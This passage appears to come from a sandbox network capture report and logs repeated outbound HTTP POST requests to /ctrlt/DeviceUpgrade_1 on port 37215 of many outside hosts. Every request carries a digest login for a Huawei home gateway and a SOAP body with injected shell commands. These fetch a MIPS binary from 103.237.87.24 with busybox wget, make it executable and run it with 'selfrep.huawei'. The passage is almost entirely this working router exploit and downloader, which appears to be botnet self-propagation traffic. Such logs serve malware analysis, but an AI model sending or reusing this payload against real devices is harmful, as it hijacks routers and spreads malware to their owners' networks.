20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1006192.168.2.1357354197.128.31.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411919117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1007192.168.2.1341586108.150.65.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.429681063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1008192.168.2.135468441.175.243.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.429713011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1009192.168.2.135075241.197.150.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.429714918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1010192.168.2.1360584178.200.190.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.429734945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1011192.168.2.133986841.181.36.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.429740906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1012192.168.2.1356746157.156.70.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.429769039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1013192.168.2.1348468157.46.102.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.429799080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1014192.168.2.135415241.19.114.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.429856062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1015192.168.2.133748018.201.33.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430061102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1016192.168.2.1349284197.125.222.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430066109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
